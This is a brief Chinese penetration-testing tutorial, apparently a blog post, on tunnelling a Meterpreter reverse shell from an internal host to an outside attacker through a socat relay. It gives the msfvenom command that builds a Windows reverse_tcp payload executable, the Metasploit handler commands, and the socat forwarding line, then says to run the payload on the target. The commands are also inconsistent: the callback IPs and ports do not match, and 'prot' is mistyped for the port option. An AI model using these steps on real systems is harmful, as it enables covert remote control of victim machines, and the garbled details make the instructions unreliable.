1. 首页
  2. 渗透测试

【原创】内网转发连接外网meterpreter

1 应用场景

在多个或者两个不网络中使用正向连接远程的攻击载荷,但是有时会有限制,如防火墙同事也会暴露我们在网络中的位置。让攻击载荷反向连接 meterpreter 同时也能隐藏攻击者在网络的位置。

如图

【原创】内网转发连接外网meterpreter

可以使用socat重定向攻击载荷 连接上meterpreter。

2 操作步骤

2.1 生成攻击载荷

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.147 lport=12345 -f exe >~/Desktop/lab/s.exe

metasploit 执行

msf5 >  use exploit/multi/handler
msf5 exploit(multi/handler) >  set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set prot 12345
prot => 12345
exploit

2.1 执行socat命令

在192.168.0.156机子上执行

socat TCP4-LISTEN:12345,reuseaddr,fork TCP4:192.168.0.119:4444

2.3在内网目标上执行生成的攻击载荷。

【原创】内网转发连接外网meterpreter

原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/1203.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息